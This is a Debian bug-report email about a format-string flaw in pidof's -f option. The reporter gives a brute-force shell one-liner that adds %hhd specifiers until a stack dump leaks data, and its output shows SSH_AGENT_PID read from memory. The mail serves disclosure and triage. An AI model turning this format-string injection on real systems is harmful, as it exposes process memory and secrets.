Bug#924792: pidof: unsanitized user input makes pidof crash

[Matteo Croce]

> What's the attack vector here (making this an exploit rather than
> "just" a bug)?
> 

I didn't investigate too much, but with a trivial brute force I can add
%hhd at will until I dump what I need from the stack:

$ arg='[%d '; until ./pidof -f "$arg] mem: %s" pidof teststring |grep
-q teststring; do arg="$arg %hhd"; done
$ ./pidof -f "$arg] mem: %s"
pidof teststring [30286  0 -128 0 48 -45 -1 0 -112 -128 0 0 0 -40 0 0 0
120 -32 7 72 7 -112 28 0 88 0 0 47 47 0 0 0 0 95 76 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 -48 8 -16 0 -96 116 8 -104 -16 -88 -92 0 2 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 -64 0 -64 8 5 0 0 -96 1 -43 0 0 -32 0 -64 -16 0 0 0 19 0 8 0 -64
0 -124 -16 0 0 0 -124 -124 0 0 0 56 80 10 0 0 -16 0 0 30 -8 -96 5 -56
-48 -45 11] mem: teststring

$ arg='[%d '; until ./pidof -f "$arg] mem: %s" pidof |grep -q
SSH_AGENT_PID ; do arg="$arg %hhd"; done
$ ./pidof -f "$arg] mem: %s"
pidof [31295  0 -128 0 104 -49 -1 0 -112 -128 0 0 0 -40 0 0 0 120 32 7
72 7 -112 28 0 88 0 0 47 47 0 0 0 0 95 76 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 16 8 -16 0 -96 116 8 -104 -16 -24 -28 0 2 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 -64 0
-64 72 4 0 0 -96 1 -43 0 0 -32 0 -64 -16 64 0 0 19 0 72 0 -64 0 -60 -16
64 0 0 -60 -60 0 0 0 112 80 10 0 0 -16 64 0 30 56 -96 4 -60 -52 -49 22
0 28 39] mem: SSH_AGENT_PID=892

Probably someone more skilled and motivated than me can do much
better (or worse, depends).

> Wouldn't you need to have some process which was passing untrusted
> data
> directly to the `-f` argument, is that likely in the real world?
> 
> Ian.

I hope not, but you can never know.

Regards,
-- 
Matteo Croce
per aspera ad upstream